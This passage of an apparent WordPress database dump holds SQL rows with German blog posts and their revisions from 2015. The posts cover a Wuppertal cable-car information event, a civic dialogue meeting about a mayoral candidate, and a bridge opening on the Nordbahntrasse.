wurden, als würde man in diesem Jahr noch mit den Bauarbeiten beginnen und max. 90% der Summe seitens des VRR gefördert werden kann.\r\nWenn man von einem Baubeginn in 8 bis 10 Jahren mit entsprechend gestiegenen Preisen ausgeht, bleibt die Stadt u.U. auf den Restkosten sitzen.\r\nEs gibt noch viele Fragen, die auf den folgenden Veranstaltungen dskutiert werden müssen.\r\n\r\n','erste Infoveranstaltung Seilbahn','','publish','open','open','','erste-infoveranstaltung-seilbahn','','','2015-05-20 10:30:22','2015-05-20 08:30:22','',0,'http://www.ollital.de/wordpress/?p=189',0,'post','',0),(190,2,'2015-05-19 21:53:32','2015-05-19 19:53:32','Die Mensa der Bergischen Universität hatte man als Kulisse für die Auftaktveranstaltung zur Informationsreihe zu den Seilbahnplänen gewählt.\r\nIch schätze, es waren ca. 200 bis 250 Menschen anwensend (ich tu mich mit solchen Schätzungen allerdings immer schwer). Dabei waren sowohl Studenten,\r\nBetroffene (Grundstückseigentümer und Anwohner an dem geplanten Trassenverlauf) als auch einfach Wuppertaler Bürger vertreten, die alle ihre Fragen\r\nund Bedenken zu dem Projekt vortragen wollten. Herr Jäger von WSW mobil stellte zunächst klar, dass es sich momentanum eine Vorstudie zur Machbarkeitsstudie handelt.\r\nDie Planungen gehen von einer Dreiseilumlaufbahn mit einer Länge von 2800m aus. Dabei soll über 6 Stützen mit einer Höhe von bis zu 70m eine Höhendifferenz von 165m überwunden werden.\r\nInsgesamt gibt es drei Stationen (Hauptbahnhof, Uni und Schulzentrum Süd, wo auch der Antrieb\r\nSoviel zur Technik.\r\nDie Seilbahn wird \"integraler Bestandteil des ÖPNV sein und mit allen VRR-Tickets benutzbar sein.Im Gegenzug verspricht sich die WSW eine Ausdünnung der Buslinien, die momentan zur Uni und zum Schulzentrum Süd fahren. Hier sehe ich, wieauch angemerkt, kritisch, dass die Menschen, die zwischendurch aus diesen Bussen ein-/und aussteigen, einen Teil ihrer Mobilität verlieren.\r\nIn einem sehr ausführlichen Frageblock konnte jeder sein Anliegen vorbringen. Die Grundstückseigentümer hatte wie erwartet vor allem die Sorge um den Wertverlust ihrer Immobilien,\r\ndie Anwohner sorgten sich um ihre Privatsphäre, den Lärm und Dreck, der ggf. aus den Kabinen herausgeworfen werden könnte.\r\nHerr Jäger ließ keine frage unbeantwortet, so dass hier scheinbar aus den Fehlern um den Verkauf des Carnaper Platzes gelernt wurde und die Bürger wirklich frühzeitig in die Pläne\r\nmit einbezogen wird. Zitat: \"Ihre Ängste werden ernst genommen.\"\r\nIch merke aber kritisch an, dass hier die Baukosten so berechnet wurden, als würde man in diesem Jahr noch mit den Bauarbeiten beginnen und max. 90% der Summe seitens des VRR gefördert werden kann.\r\nWenn man von einem Baubeginn in 8 bis 10 Jahren mit entsprechend gestiegenen Preisen ausgeht, bleibt die Stadt u.U. auf den Restkosten sitzen.\r\nEs gibt noch viele Fragen, die auf den folgenden Veranstaltungen dskutiert werden müssen.\r\n\r\n','erste Infoveranstaltung Seilbahn','','inherit','open','open','','189-revision-v1','','','2015-05-19 21:53:32','2015-05-19 19:53:32','',189,'http://www.ollital.de/wordpress/index.php/2015/05/189-revision-v1/',0,'revision','',0),(191,2,'2015-05-19 21:58:14','2015-05-19 19:58:14','','Seilbahninfo','','inherit','open','open','','seilbahninfo','','','2015-05-19 21:58:14','2015-05-19 19:58:14','',189,'http://www.ollital.de/wordpress/wp-content/uploads/2015/05/Seilbahninfo.jpg',0,'attachment','image/jpeg',0),(192,2,'2015-05-20 10:29:30','2015-05-20 08:29:30','\"Seilbahninfo\"Die Mensa der Bergischen Universität hatte man als Kulisse für die Auftaktveranstaltung zur Informationsreihe zu den Seilbahnplänen gewählt.\nIch schätze, es waren ca. 200 bis 250 Menschen anwesend (ich tu mich mit solchen Schätzungen allerdings etwas schwer). Dabei waren sowohl Studenten,\nBetroffene (Grundstückseigentümer und Anwohner an dem geplanten Trassenverlauf) als auch einfach Wuppertaler Bürger vertreten, die alle ihre Fragen\nund Bedenken zu dem Projekt vortragen wollten. Herr Jäger von WSW mobil stellte zunächst klar, dass es sich momentan um eine Vorstudie zur Machbarkeitsstudie handelt.\nDie Planungen gehen von einer Dreiseilumlaufbahn mit einer Länge von 2800m aus. Dabei soll über 6 Stützen mit einer Höhe von bis zu 70m eine Höhendifferenz von 165m überwunden werden.\nInsgesamt gibt es drei Stationen (Hauptbahnhof, Uni und Schulzentrum Süd, wo auch der Antrieb installiert werden wird)\nSoviel zur Technik.\nDie Seilbahn wird \"integraler Bestandteil des ÖPNV sein und mit allen VRR-Tickets benutzbar sein.Im Gegenzug verspricht sich die WSW eine Ausdünnung der Buslinien, die momentan zur Uni und zum Schulzentrum Süd fahren. Hier sehe ich, wie auch angemerkt wurde, kritisch, dass die Menschen, die zwischendurch aus diesen Bussen ein-/und aussteigen, einen Teil ihrer Mobilität verlieren.\nIn einem sehr ausführlichen Frageblock konnte jeder sein Anliegen vorbringen. Die Grundstückseigentümer hatte wie erwartet vor allem die Sorge um den Wertverlust ihrer Immobilien,\ndie Anwohner sorgten sich um ihre Privatsphäre, den Lärm und Dreck, der ggf. aus den Kabinen herausgeworfen werden könnte.\nHerr Jäger ließ keine Frage unbeantwortet, so dass hier scheinbar aus den Fehlern um den Verkauf des Carnaper Platzes gelernt wurde und die Bürger wirklich frühzeitig in die Pläne\nmit einbezogen wird. Zitat: \"Ihre Ängste werden ernst genommen.\"\nIch merke aber kritisch an, dass hier die Baukosten so berechnet wurden, als würde man in diesem Jahr noch mit den Bauarbeiten beginnen und max. 90% der Summe seitens des VRR gefördert werden kann.\nWenn man von einem Baubeginn in 8 bis 10 Jahren mit entsprechend gestiegenen Preisen ausgeht, bleibt die Stadt u.U. auf den Restkosten sitzen.\nEs gibt noch viele Fragen, die auf den folgenden Veranstaltungen dskutiert werden müssen.\n\n','erste Infoveranstaltung Seilbahn','','inherit','open','open','','189-autosave-v1','','','2015-05-20 10:29:30','2015-05-20 08:29:30','',189,'http://www.ollital.de/wordpress/index.php/2015/05/189-autosave-v1/',0,'revision','',0),(193,2,'2015-05-19 21:59:11','2015-05-19 19:59:11','\"Seilbahninfo\"Die Mensa der Bergischen Universität hatte man als Kulisse für die Auftaktveranstaltung zur Informationsreihe zu den Seilbahnplänen gewählt.\r\nIch schätze, es waren ca. 200 bis 250 Menschen anwensend (ich tu mich mit solchen Schätzungen allerdings immer schwer). Dabei waren sowohl Studenten,\r\nBetroffene (Grundstückseigentümer und Anwohner an dem geplanten Trassenverlauf) als auch einfach Wuppertaler Bürger vertreten, die alle ihre Fragen\r\nund Bedenken zu dem Projekt vortragen wollten. Herr Jäger von WSW mobil stellte zunächst klar, dass es sich momentanum eine Vorstudie zur Machbarkeitsstudie handelt.\r\nDie Planungen gehen von einer Dreiseilumlaufbahn mit einer Länge von 2800m aus. Dabei soll über 6 Stützen mit einer Höhe von bis zu 70m eine Höhendifferenz von 165m überwunden werden.\r\nInsgesamt gibt es drei Stationen (Hauptbahnhof, Uni und Schulzentrum Süd, wo auch der Antrieb\r\nSoviel zur Technik.\r\nDie Seilbahn wird \"integraler Bestandteil des ÖPNV sein und mit allen VRR-Tickets benutzbar sein.Im Gegenzug verspricht sich die WSW eine Ausdünnung der Buslinien, die momentan zur Uni und zum Schulzentrum Süd fahren. Hier sehe ich, wieauch angemerkt, kritisch, dass die Menschen, die zwischendurch aus diesen Bussen ein-/und aussteigen, einen Teil ihrer Mobilität verlieren.\r\nIn einem sehr ausführlichen Frageblock konnte jeder sein Anliegen vorbringen. Die Grundstückseigentümer hatte wie erwartet vor allem die Sorge um den Wertverlust ihrer Immobilien,\r\ndie Anwohner sorgten sich um ihre Privatsphäre, den Lärm und Dreck, der ggf. aus den Kabinen herausgeworfen werden könnte.\r\nHerr Jäger ließ keine frage unbeantwortet, so dass hier scheinbar aus den Fehlern um den Verkauf des Carnaper Platzes gelernt wurde und die Bürger wirklich frühzeitig in die Pläne\r\nmit einbezogen wird. Zitat: \"Ihre Ängste werden ernst genommen.\"\r\nIch merke aber kritisch an, dass hier die Baukosten so berechnet wurden, als würde man in diesem Jahr noch mit den Bauarbeiten beginnen und max. 90% der Summe seitens des VRR gefördert werden kann.\r\nWenn man von einem Baubeginn in 8 bis 10 Jahren mit entsprechend gestiegenen Preisen ausgeht, bleibt die Stadt u.U. auf den Restkosten sitzen.\r\nEs gibt noch viele Fragen, die auf den folgenden Veranstaltungen dskutiert werden müssen.\r\n\r\n','erste Infoveranstaltung Seilbahn','','inherit','open','open','','189-revision-v1','','','2015-05-19 21:59:11','2015-05-19 19:59:11','',189,'http://www.ollital.de/wordpress/index.php/2015/05/189-revision-v1/',0,'revision','',0),(194,2,'2015-05-20 07:06:32','2015-05-20 05:06:32','\"Seilbahninfo\"Die Mensa der Bergischen Universität hatte man als Kulisse für die Auftaktveranstaltung zur Informationsreihe zu den Seilbahnplänen gewählt.\r\nIch schätze, es waren ca. 200 bis 250 Menschen anwensend (ich tu mich mit solchen Schätzungen allerdings immer schwer). Dabei waren sowohl Studenten,\r\nBetroffene (Grundstückseigentümer und Anwohner an dem geplanten Trassenverlauf) als auch einfach Wuppertaler Bürger vertreten, die alle ihre Fragen\r\nund Bedenken zu dem Projekt vortragen wollten. Herr Jäger von WSW mobil stellte zunächst klar, dass es sich momentanum eine Vorstudie zur Machbarkeitsstudie handelt.\r\nDie Planungen gehen von einer Dreiseilumlaufbahn mit einer Länge von 2800m aus. Dabei soll über 6 Stützen mit einer Höhe von bis zu 70m eine Höhendifferenz von 165m überwunden werden.\r\nInsgesamt gibt es drei Stationen (Hauptbahnhof, Uni und Schulzentrum Süd, wo auch der Antrieb\r\nSoviel zur Technik.\r\nDie Seilbahn wird \"integraler Bestandteil des ÖPNV sein und mit allen VRR-Tickets benutzbar sein.Im Gegenzug verspricht sich die WSW eine Ausdünnung der Buslinien, die momentan zur Uni und zum Schulzentrum Süd fahren. Hier sehe ich, wieauch angemerkt, kritisch, dass die Menschen, die zwischendurch aus diesen Bussen ein-/und aussteigen, einen Teil ihrer Mobilität verlieren.\r\nIn einem sehr ausführlichen Frageblock konnte jeder sein Anliegen vorbringen. Die Grundstückseigentümer hatte wie erwartet vor allem die Sorge um den Wertverlust ihrer Immobilien,\r\ndie Anwohner sorgten sich um ihre Privatsphäre, den Lärm und Dreck, der ggf. aus den Kabinen herausgeworfen werden könnte.\r\nHerr Jäger ließ keine Frage unbeantwortet, so dass hier scheinbar aus den Fehlern um den Verkauf des Carnaper Platzes gelernt wurde und die Bürger wirklich frühzeitig in die Pläne\r\nmit einbezogen wird. Zitat: \"Ihre Ängste werden ernst genommen.\"\r\nIch merke aber kritisch an, dass hier die Baukosten so berechnet wurden, als würde man in diesem Jahr noch mit den Bauarbeiten beginnen und max. 90% der Summe seitens des VRR gefördert werden kann.\r\nWenn man von einem Baubeginn in 8 bis 10 Jahren mit entsprechend gestiegenen Preisen ausgeht, bleibt die Stadt u.U. auf den Restkosten sitzen.\r\nEs gibt noch viele Fragen, die auf den folgenden Veranstaltungen dskutiert werden müssen.\r\n\r\n','erste Infoveranstaltung Seilbahn','','inherit','open','open','','189-revision-v1','','','2015-05-20 07:06:32','2015-05-20 05:06:32','',189,'http://www.ollital.de/wordpress/index.php/2015/05/189-revision-v1/',0,'revision','',0),(195,2,'2015-05-20 07:07:01','2015-05-20 05:07:01','\"Seilbahninfo\"Die Mensa der Bergischen Universität hatte man als Kulisse für die Auftaktveranstaltung zur Informationsreihe zu den Seilbahnplänen gewählt.\r\nIch schätze, es waren ca. 200 bis 250 Menschen anwensend (ich tu mich mit solchen Schätzungen allerdings immer schwer). Dabei waren sowohl Studenten,\r\nBetroffene (Grundstückseigentümer und Anwohner an dem geplanten Trassenverlauf) als auch einfach Wuppertaler Bürger vertreten, die alle ihre Fragen\r\nund Bedenken zu dem Projekt vortragen wollten. Herr Jäger von WSW mobil stellte zunächst klar, dass es sich momentanum eine Vorstudie zur Machbarkeitsstudie handelt.\r\nDie Planungen gehen von einer Dreiseilumlaufbahn mit einer Länge von 2800m aus. Dabei soll über 6 Stützen mit einer Höhe von bis zu 70m eine Höhendifferenz von 165m überwunden werden.\r\nInsgesamt gibt es drei Stationen (Hauptbahnhof, Uni und Schulzentrum Süd, wo auch der Antrieb installiert werden wird)\r\nSoviel zur Technik.\r\nDie Seilbahn wird \"integraler Bestandteil des ÖPNV sein und mit allen VRR-Tickets benutzbar sein.Im Gegenzug verspricht sich die WSW eine Ausdünnung der Buslinien, die momentan zur Uni und zum Schulzentrum Süd fahren. Hier sehe ich, wieauch angemerkt, kritisch, dass die Menschen, die zwischendurch aus diesen Bussen ein-/und aussteigen, einen Teil ihrer Mobilität verlieren.\r\nIn einem sehr ausführlichen Frageblock konnte jeder sein Anliegen vorbringen. Die Grundstückseigentümer hatte wie erwartet vor allem die Sorge um den Wertverlust ihrer Immobilien,\r\ndie Anwohner sorgten sich um ihre Privatsphäre, den Lärm und Dreck, der ggf. aus den Kabinen herausgeworfen werden könnte.\r\nHerr Jäger ließ keine Frage unbeantwortet, so dass hier scheinbar aus den Fehlern um den Verkauf des Carnaper Platzes gelernt wurde und die Bürger wirklich frühzeitig in die Pläne\r\nmit einbezogen wird. Zitat: \"Ihre Ängste werden ernst genommen.\"\r\nIch merke aber kritisch an, dass hier die Baukosten so berechnet wurden, als würde man in diesem Jahr noch mit den Bauarbeiten beginnen und max. 90% der Summe seitens des VRR gefördert werden kann.\r\nWenn man von einem Baubeginn in 8 bis 10 Jahren mit entsprechend gestiegenen Preisen ausgeht, bleibt die Stadt u.U. auf den Restkosten sitzen.\r\nEs gibt noch viele Fragen, die auf den folgenden Veranstaltungen dskutiert werden müssen.\r\n\r\n','erste Infoveranstaltung Seilbahn','','inherit','open','open','','189-revision-v1','','','2015-05-20 07:07:01','2015-05-20 05:07:01','',189,'http://www.ollital.de/wordpress/index.php/2015/05/189-revision-v1/',0,'revision','',0),(196,2,'2015-05-20 07:08:20','2015-05-20 05:08:20','\"Seilbahninfo\"Die Mensa der Bergischen Universität hatte man als Kulisse für die Auftaktveranstaltung zur Informationsreihe zu den Seilbahnplänen gewählt.\r\nIch schätze, es waren ca. 200 bis 250 Menschen anwensend (ich tu mich mit solchen Schätzungen allerdings immer schwer). Dabei waren sowohl Studenten,\r\nBetroffene (Grundstückseigentümer und Anwohner an dem geplanten Trassenverlauf) als auch einfach Wuppertaler Bürger vertreten, die alle ihre Fragen\r\nund Bedenken zu dem Projekt vortragen wollten. Herr Jäger von WSW mobil stellte zunächst klar, dass es sich momentanum eine Vorstudie zur Machbarkeitsstudie handelt.\r\nDie Planungen gehen von einer Dreiseilumlaufbahn mit einer Länge von 2800m aus. Dabei soll über 6 Stützen mit einer Höhe von bis zu 70m eine Höhendifferenz von 165m überwunden werden.\r\nInsgesamt gibt es drei Stationen (Hauptbahnhof, Uni und Schulzentrum Süd, wo auch der Antrieb installiert werden wird)\r\nSoviel zur Technik.\r\nDie Seilbahn wird \"integraler Bestandteil des ÖPNV sein und mit allen VRR-Tickets benutzbar sein.Im Gegenzug verspricht sich die WSW eine Ausdünnung der Buslinien, die momentan zur Uni und zum Schulzentrum Süd fahren. Hier sehe ich, wie auch angemerkt wurde, kritisch, dass die Menschen, die zwischendurch aus diesen Bussen ein-/und aussteigen, einen Teil ihrer Mobilität verlieren.\r\nIn einem sehr ausführlichen Frageblock konnte jeder sein Anliegen vorbringen. Die Grundstückseigentümer hatte wie erwartet vor allem die Sorge um den Wertverlust ihrer Immobilien,\r\ndie Anwohner sorgten sich um ihre Privatsphäre, den Lärm und Dreck, der ggf. aus den Kabinen herausgeworfen werden könnte.\r\nHerr Jäger ließ keine Frage unbeantwortet, so dass hier scheinbar aus den Fehlern um den Verkauf des Carnaper Platzes gelernt wurde und die Bürger wirklich frühzeitig in die Pläne\r\nmit einbezogen wird. Zitat: \"Ihre Ängste werden ernst genommen.\"\r\nIch merke aber kritisch an, dass hier die Baukosten so berechnet wurden, als würde man in diesem Jahr noch mit den Bauarbeiten beginnen und max. 90% der Summe seitens des VRR gefördert werden kann.\r\nWenn man von einem Baubeginn in 8 bis 10 Jahren mit entsprechend gestiegenen Preisen ausgeht, bleibt die Stadt u.U. auf den Restkosten sitzen.\r\nEs gibt noch viele Fragen, die auf den folgenden Veranstaltungen dskutiert werden müssen.\r\n\r\n','erste Infoveranstaltung Seilbahn','','inherit','open','open','','189-revision-v1','','','2015-05-20 07:08:20','2015-05-20 05:08:20','',189,'http://www.ollital.de/wordpress/index.php/2015/05/189-revision-v1/',0,'revision','',0),(197,2,'2015-05-20 10:29:38','2015-05-20 08:29:38','\"Seilbahninfo\"Die Mensa der Bergischen Universität hatte man als Kulisse für die Auftaktveranstaltung zur Informationsreihe zu den Seilbahnplänen gewählt.\r\nIch schätze, es waren ca. 200 bis 250 Menschen anwesend (ich tu mich mit solchen Schätzungen allerdings etwas schwer). Dabei waren sowohl Studenten,\r\nBetroffene (Grundstückseigentümer und Anwohner an dem geplanten Trassenverlauf) als auch einfach Wuppertaler Bürger vertreten, die alle ihre Fragen\r\nund Bedenken zu dem Projekt vortragen wollten. Herr Jäger von WSW mobil stellte zunächst klar, dass es sich momentan um eine Vorstudie zur Machbarkeitsstudie handelt.\r\nDie Planungen gehen von einer Dreiseilumlaufbahn mit einer Länge von 2800m aus. Dabei soll über 6 Stützen mit einer Höhe von bis zu 70m eine Höhendifferenz von 165m überwunden werden.\r\nInsgesamt gibt es drei Stationen (Hauptbahnhof, Uni und Schulzentrum Süd, wo auch der Antrieb installiert werden wird)\r\nSoviel zur Technik.\r\nDie Seilbahn wird \"integraler Bestandteil des ÖPNV sein und mit allen VRR-Tickets benutzbar sein.Im Gegenzug verspricht sich die WSW eine Ausdünnung der Buslinien, die momentan zur Uni und zum Schulzentrum Süd fahren. Hier sehe ich, wie auch angemerkt wurde, kritisch, dass die Menschen, die zwischendurch aus diesen Bussen ein-/und aussteigen, einen Teil ihrer Mobilität verlieren.\r\nIn einem sehr ausführlichen Frageblock konnte jeder sein Anliegen vorbringen. Die Grundstückseigentümer hatte wie erwartet vor allem die Sorge um den Wertverlust ihrer Immobilien,\r\ndie Anwohner sorgten sich um ihre Privatsphäre, den Lärm und Dreck, der ggf. aus den Kabinen herausgeworfen werden könnte.\r\nHerr Jäger ließ keine Frage unbeantwortet, so dass hier scheinbar aus den Fehlern um den Verkauf des Carnaper Platzes gelernt wurde und die Bürger wirklich frühzeitig in die Pläne\r\nmit einbezogen wird. Zitat: \"Ihre Ängste werden ernst genommen.\"\r\nIch merke aber kritisch an, dass hier die Baukosten so berechnet wurden, als würde man in diesem Jahr noch mit den Bauarbeiten beginnen und max. 90% der Summe seitens des VRR gefördert werden kann.\r\nWenn man von einem Baubeginn in 8 bis 10 Jahren mit entsprechend gestiegenen Preisen ausgeht, bleibt die Stadt u.U. auf den Restkosten sitzen.\r\nEs gibt noch viele Fragen, die auf den folgenden Veranstaltungen dskutiert werden müssen.\r\n\r\n','erste Infoveranstaltung Seilbahn','','inherit','open','open','','189-revision-v1','','','2015-05-20 10:29:38','2015-05-20 08:29:38','',189,'http://www.ollital.de/wordpress/index.php/2015/05/189-revision-v1/',0,'revision','',0),(198,2,'2015-05-20 10:30:22','2015-05-20 08:30:22','\"Seilbahninfo\"Die Mensa der Bergischen Universität hatte man als Kulisse für die Auftaktveranstaltung zur Informationsreihe zu den Seilbahnplänen gewählt.\r\nIch schätze, es waren ca. 200 bis 250 Menschen anwesend (ich tu mich mit solchen Schätzungen allerdings etwas schwer). Dabei waren sowohl Studenten,\r\nBetroffene (Grundstückseigentümer und Anwohner an dem geplanten Trassenverlauf) als auch einfach Wuppertaler Bürger vertreten, die alle ihre Fragen\r\nund Bedenken zu dem Projekt vortragen wollten. Herr Jäger von WSW mobil stellte zunächst klar, dass es sich momentan um eine Vorstudie zur Machbarkeitsstudie handelt.\r\nDie Planungen gehen von einer Dreiseilumlaufbahn mit einer Länge von 2800m aus. Dabei soll über 6 Stützen mit einer Höhe von bis zu 70m eine Höhendifferenz von 165m überwunden werden.\r\nInsgesamt gibt es drei Stationen (Hauptbahnhof, Uni und Schulzentrum Süd, wo auch der Antrieb installiert werden wird)\r\nSoviel zur Technik.\r\nDie Seilbahn wird \"integraler Bestandteil des ÖPNV sein und mit allen VRR-Tickets benutzbar sein.Im Gegenzug verspricht sich die WSW eine Ausdünnung der Buslinien, die momentan zur Uni und zum Schulzentrum Süd fahren. Hier sehe ich, wie auch angemerkt wurde, kritisch, dass die Menschen, die zwischendurch aus diesen Bussen ein-/und aussteigen, einen Teil ihrer Mobilität verlieren.\r\nIn einem sehr ausführlichen Frageblock konnte jeder sein Anliegen vorbringen. Die Grundstückseigentümer hatte wie erwartet vor allem die Sorge um den Wertverlust ihrer Immobilien,\r\nDie Anwohner sorgten sich um ihre Privatsphäre, den Lärm und Dreck, der ggf. aus den Kabinen herausgeworfen werden könnte.\r\nHerr Jäger ließ keine Frage unbeantwortet, so dass hier scheinbar aus den Fehlern um den Verkauf des Carnaper Platzes gelernt wurde und die Bürger wirklich frühzeitig in die Pläne\r\nmit einbezogen wird. Zitat: \"Ihre Ängste werden ernst genommen.\"\r\nIch merke aber kritisch an, dass hier die Baukosten so berechnet wurden, als würde man in diesem Jahr noch mit den Bauarbeiten beginnen und max. 90% der Summe seitens des VRR gefördert werden kann.\r\nWenn man von einem Baubeginn in 8 bis 10 Jahren mit entsprechend gestiegenen Preisen ausgeht, bleibt die Stadt u.U. auf den Restkosten sitzen.\r\nEs gibt noch viele Fragen, die auf den folgenden Veranstaltungen dskutiert werden müssen.\r\n\r\n','erste Infoveranstaltung Seilbahn','','inherit','open','open','','189-revision-v1','','','2015-05-20 10:30:22','2015-05-20 08:30:22','',189,'http://www.ollital.de/wordpress/index.php/2015/05/189-revision-v1/',0,'revision','',0),(199,2,'2015-05-21 18:22:30','2015-05-21 16:22:30','Im Wuppertaler Brauhaus fand heute das fünfte Treffen des Bürgerdialogs 3.0 statt.\r\nDen etwa 150 interessierte Bürgern wurde bekanntgegeben, dass Wuppertal 3.0 beschlossen hat, keinen eigenen Kandidaten ins Rennen zu schicken, da es bei allen Vorschlägen keine Nominierung gab, der mit einer reellen Chance bei der Wahl hätten rechnen können. Daher hat man sich entschlossen, keinen Kandidaten aufzustellen. Im Plenum waren viele Stimmen zu hören, die ihre Enttäuschung äusserten.\r\nDavid von Utopiastadt lobte aber, dass der Prozess des Bürgerdialogs zu positiven Ergebnissen geführt hat.','Kandidat 3.0','','publish','open','open','','kandidat-3-0','','','2015-05-21 21:10:49','2015-05-21 19:10:49','',0,'http://www.ollital.de/wordpress/?p=199',0,'post','',0),(200,2,'2015-05-20 13:11:54','2015-05-20 11:11:54','Auf dem Johannes-Rau-Platz vor dem Rathaus fand heute das fünfte Treffen des Bürgerdialogs 3.0 statt.\r\nEtwa xxx interessierte Bürgern wurde \"\" als Kandidat für die Oberbürgermeisterwahl am 13. September\r\nvorgestellt.','Kandidat 3.0','','inherit','open','open','','199-revision-v1','','','2015-05-20 13:11:54','2015-05-20 11:11:54','',199,'http://www.ollital.de/wordpress/index.php/2015/05/199-revision-v1/',0,'revision','',0),(201,2,'2015-05-20 21:28:25','2015-05-20 19:28:25','Olli Graf, Wuppertaler gebürtig und aus Überzeugung.\r\nJahrgang 1969\r\nDipl. Inform. (FH)\r\nPirat\r\nStadtverordneter im Rat der Stadt Wuppertal\r\nAuschuss für Stadtentwicklung, Wirtschaft und Bauen\r\nBetriebsauschuss Gebäudemanagement Wuppertal\r\nMitglied in der Fraktion BÜNDNIS 90 / Die Grünen im Stadtrat #talrat\r\n','Über mich','','inherit','open','open','','74-revision-v1','','','2015-05-20 21:28:25','2015-05-20 19:28:25','',74,'http://www.ollital.de/wordpress/index.php/2015/05/74-revision-v1/',0,'revision','',0),(202,2,'2015-05-21 10:57:33','2015-05-21 08:57:33','Im Wuppertaler Brauhaus fand heute das fünfte Treffen des Bürgerdialogs 3.0 statt.\r\nDen etwa xxx interessierte Bürgern wurde \"\" als Kandidat für die Oberbürgermeisterwahl am 13. September\r\nvorgestellt.','Kandidat 3.0','','inherit','open','open','','199-revision-v1','','','2015-05-21 10:57:33','2015-05-21 08:57:33','',199,'http://www.ollital.de/wordpress/index.php/2015/05/199-revision-v1/',0,'revision','',0),(203,2,'2015-05-21 10:57:54','2015-05-21 08:57:54','Im Wuppertaler Brauhaus fand heute das fünfte Treffen des Bürgerdialogs 3.0 statt.\r\nDen etwa xxx interessierte Bürgern wurde \"\" als Kandidat für die Oberbürgermeisterwahl am 13. September\r\nvorgestellt.','Kandidat 3.0 gekürt','','inherit','open','open','','199-revision-v1','','','2015-05-21 10:57:54','2015-05-21 08:57:54','',199,'http://www.ollital.de/wordpress/index.php/2015/05/199-revision-v1/',0,'revision','',0),(204,2,'2015-05-21 18:22:30','2015-05-21 16:22:30','Im Wuppertaler Brauhaus fand heute das fünfte Treffen des Bürgerdialogs 3.0 statt.\r\nDen etwa 150 interessierte Bürgern wurde bekanntgegeben, dass Wuppertal 3.0 beschlossen hat, keinen eigenen Kandidaten ins Rennen zu schicken, da es bei allen Vorschlägen keine Nominierung gab, der mit einer reellen Chance bei der Wahl hätte.','Kandidat 3.0','','inherit','open','open','','199-revision-v1','','','2015-05-21 18:22:30','2015-05-21 16:22:30','',199,'http://www.ollital.de/wordpress/index.php/2015/05/199-revision-v1/',0,'revision','',0),(205,2,'2015-05-21 21:10:10','2015-05-21 19:10:10','Im Wuppertaler Brauhaus fand heute das fünfte Treffen des Bürgerdialogs 3.0 statt.\nDen etwa 150 interessierte Bürgern wurde bekanntgegeben, dass Wuppertal 3.0 beschlossen hat, keinen eigenen Kandidaten ins Rennen zu schicken, da es bei allen Vorschlägen keine Nominierung gab, der mit einer reellen Chance bei der Wahl hätten rechnen können. Daher hat man sich entschlossen, keinen Kandidaten aufzustellen. Im Plenum waren viele Stimmen zu hören, die darüber \nDavid von Utopiastadt lobte aber, dass der Prozess des Bürgerdialogs zu positiven Ergebnissen geführt hat.','Kandidat 3.0','','inherit','open','open','','199-autosave-v1','','','2015-05-21 21:10:10','2015-05-21 19:10:10','',199,'http://www.ollital.de/wordpress/index.php/2015/05/199-autosave-v1/',0,'revision','',0),(206,2,'2015-05-21 18:24:44','2015-05-21 16:24:44','Im Wuppertaler Brauhaus fand heute das fünfte Treffen des Bürgerdialogs 3.0 statt.\r\nDen etwa 150 interessierte Bürgern wurde bekanntgegeben, dass Wuppertal 3.0 beschlossen hat, keinen eigenen Kandidaten ins Rennen zu schicken, da es bei allen Vorschlägen keine Nominierung gab, der mit einer reellen Chance bei der Wahl hätte.\r\nDer Sprecher von Utopiastadt lobte aber, dass der Prozess des Bürgerdialogs zu positiven Ergebnissen geführt hat.','Kandidat 3.0','','inherit','open','open','','199-revision-v1','','','2015-05-21 18:24:44','2015-05-21 16:24:44','',199,'http://www.ollital.de/wordpress/index.php/2015/05/199-revision-v1/',0,'revision','',0),(207,2,'2015-05-21 21:08:36','2015-05-21 19:08:36','Im Wuppertaler Brauhaus fand heute das fünfte Treffen des Bürgerdialogs 3.0 statt.\r\nDen etwa 150 interessierte Bürgern wurde bekanntgegeben, dass Wuppertal 3.0 beschlossen hat, keinen eigenen Kandidaten ins Rennen zu schicken, da es bei allen Vorschlägen keine Nominierung gab, der mit einer reellen Chance bei der Wahl hätte.\r\nDavid von Utopiastadt lobte aber, dass der Prozess des Bürgerdialogs zu positiven Ergebnissen geführt hat.','Kandidat 3.0','','inherit','open','open','','199-revision-v1','','','2015-05-21 21:08:36','2015-05-21 19:08:36','',199,'http://www.ollital.de/wordpress/index.php/2015/05/199-revision-v1/',0,'revision','',0),(208,2,'2015-05-21 21:10:49','2015-05-21 19:10:49','Im Wuppertaler Brauhaus fand heute das fünfte Treffen des Bürgerdialogs 3.0 statt.\r\nDen etwa 150 interessierte Bürgern wurde bekanntgegeben, dass Wuppertal 3.0 beschlossen hat, keinen eigenen Kandidaten ins Rennen zu schicken, da es bei allen Vorschlägen keine Nominierung gab, der mit einer reellen Chance bei der Wahl hätten rechnen können. Daher hat man sich entschlossen, keinen Kandidaten aufzustellen. Im Plenum waren viele Stimmen zu hören, die ihre Enttäuschung äusserten.\r\nDavid von Utopiastadt lobte aber, dass der Prozess des Bürgerdialogs zu positiven Ergebnissen geführt hat.','Kandidat 3.0','','inherit','open','open','','199-revision-v1','','','2015-05-21 21:10:49','2015-05-21 19:10:49','',199,'http://www.ollital.de/wordpress/index.php/2015/05/199-revision-v1/',0,'revision','',0),(211,2,'2015-05-29 18:44:55','2015-05-29 16:44:55','','Eroeffnung Bracken','','inherit','open','open','','eroeffnung-bracken','','','2015-05-29 18:44:55','2015-05-29 16:44:55','',212,'http://www.ollital.de/wordpress/wp-content/uploads/2015/05/Eroeffnung-Bracken.jpg',0,'attachment','image/jpeg',0),(212,2,'2015-05-29 18:57:44','2015-05-29 16:57:44','\"Eroeffnung\r\nHeute wurde die Brücke Bracken durch Oberbürgermeister Peter Jung und Dr. Carsten Gerhard offiziell freigegeben. Nach einem kurzen Spaziergang vom ehemaligen Bahnübergang Linderhauser Str. bis zur Brücke wohnten 80 bis 100 Bürger der traditionellen \"Banddurchschneidezeremonie\" bei, nach der der Spaziergang bis zum Haltepunkt Bracken fortgesetzt wurde. Dort sorgte die Chorgemeinschaft Nächstebreck /MGV Bracken für die musikalische Abwechslung bei den Reden von Peter Jung, Carsten Gerhard und den anderen Verantwortlichen für das Nordbahntrassenprojekt.\r\nDie Brücke ist meiner Meinung nach mit seinen roten und blauen Streben ein echter Hingucker. Mit der Freigabe der Brücke ist die Nordbahntrasse jezt von Schee bis Vohwinkel durchgängig befahrbar. Für einige der Nebenstrecken laufen schon Planungen, um sie ebenfalls 